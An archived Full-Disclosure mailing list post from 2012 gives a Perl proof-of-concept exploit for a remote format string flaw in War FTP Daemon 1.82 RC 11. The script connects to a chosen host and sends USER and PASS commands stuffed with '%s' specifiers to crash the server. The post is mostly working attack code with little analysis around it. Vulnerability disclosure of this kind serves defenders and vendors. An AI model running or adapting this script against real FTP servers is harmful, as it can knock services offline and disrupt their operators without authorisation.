lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CADe7mMeG0kpDoXQkHr3vGF7FzoYK-jcKB=kiUSrdfw5PCpCqCw@mail.gmail.com> Date: Thu, 30 Aug 2012 15:23:39 -0700 From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com> To: full-disclosure@...ts.grok.org.uk Subject: War FTP Daemon Remote Format String Vulnerability # Exploit Title: War FTP Daemon Remote Format String Vulnerability # crash: http://img826.imageshack.us/img826/6222/69004160.png # Date: 2012-08-30 # Author: coolkaveh # coolkaveh@...ketmail.com # https://twitter.com/coolkaveh # Vendor Homepage: http://www.warftp.org # Version: War FTP Daemon 1.82 RC 11 # Tested on: windows XP SP3 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # War FTP Daemon Remote Format String Vulnerability #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; $|=1; $host=shift || die "$0 \$host \$port\n"; $port=shift || die "$0 \$host \$port\n"; my $username = "%s%s%s%s%s%s%s%s%s%s%s%s"; my $password = "%s%s%s%s%s%s%s%s%s%s%s%s"; print "Launch Attack ... "; $sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30) || die "HOST $host PORT $port is down!\n"; if(defined($sock1)){ $sock1->recv($content, 100, 0); sleep(2); $sock1->send("USER ".$username."\r\n", 0); $sock1->send("PASS ".$password."\r\n", 0); sleep(2); $sock1->recv($content, 100, 0); sleep(5); $sock1->close; } print "Finish!\n"; exit(1); _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists